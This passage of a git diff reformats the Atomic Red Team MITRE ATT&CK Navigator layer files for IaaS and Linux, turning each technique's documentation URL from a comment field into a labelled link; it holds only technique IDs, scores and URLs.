test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1098.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1136.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1562.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]} \ No newline at end of file +{"version":"4.3","name":"Atomic Red Team (Iaas)","description":"Atomic Red Team (Iaas) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1098.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1136.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1136","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1562.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json index 8d9d6018..ff6a3888 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json @@ -1 +1 @@ -{"version":"4.3","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1027.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1030","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1037.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1048.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1070.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1078.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1098.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1140","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1222.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1484.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"},{"techniqueID":"T1484","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1486","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"},{"techniqueID":"T1496","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1543.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1546.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1547.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1548.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1556.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"},{"techniqueID":"T1556","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1562.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1574.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1606.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"},{"techniqueID":"T1606","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"},{"techniqueID":"T1609","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"},{"techniqueID":"T1611","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]} \ No newline at end of file +{"version":"4.3","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1014","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1016","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1027.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1030","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View 